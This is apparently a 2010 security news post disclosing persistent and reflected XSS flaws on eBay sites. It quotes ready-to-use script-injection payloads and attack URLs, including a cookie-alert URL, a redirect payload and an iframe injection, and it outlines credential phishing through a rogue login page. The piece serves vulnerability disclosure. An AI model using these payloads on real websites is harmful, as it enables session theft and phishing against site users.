Persistent XSS bug discovered on eBay

Written by DP

Wednesday, 6 October 2010

Security researcher "Side3ffects" has contacted us regarding a critical persistent XSS that he discovered on eBay:

"Once you login to your account on eBay, edit the option "About me".

http://cgi3.ebay.com/ws/eBayISAPI.dll?AboutMeLogin

Now go to :

http://members.ebay.com/ws/eBayISAPI.dll?EditUserPageHTMLSource and edit with HTML enabled.

Demo URL (My profile):

http://members.ebay.com/ws/eBayISAPI.dll?ViewUserPage&userid=shell2h4ck

It is also vulnerable to redirection with the following XSS attack vector:

'"--><script>alert(/Xss2ro07 aKa Side3ffects)</script>

<script>document.onload=location.href='http://www.xssed.com</script>"

members.ebay.com Persistent XSS mirror

One of the possible exploitation scenarios is malicious people stealing cleartext credentials from registered users by injecting an iframe tag that retrieves another rogue eBay login page from a remote server.

Screenshot:

Other reported XSS bugs affecting eBay domains include (all still pending a fix):

eBay International Market, discovered by "Sony":

[Mirror]

eBay Giving Works, discovered by "d3v1l" from Security-Sh3ll:

http://donations.ebay.com/charity/event.jsp?NP_ID=-16&name=&id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

[Mirror]

Secure eBay's Law Enforcement eRequest System, discovered by "Nemessis":

https://lers.corp.ebay.com/AIP/portal/home.do?localechanged=yes&locale=

%22%3E%3Cscript%3Ealert(%22I'm%20Back%20-%20rstcenter.com%20-%20hackersblog.org%22)%3C/script%3E

[Mirror]

eBay Italy Ads, another one discovered by "d3v1l":

http://annunci.ebay.it/elettronica/audio-tv-e-video/annunci-perugia/"><iframe src=index.htm

[Mirror]

eBay has been XSSed many times in the past.

Related News on XSSed:

"Critical XSS and directory traversal flaws on Ebay.co.uk website" - DP - 3 Apr 2009

"New XSS flaws within eBay sites" - DP - 27 May 2008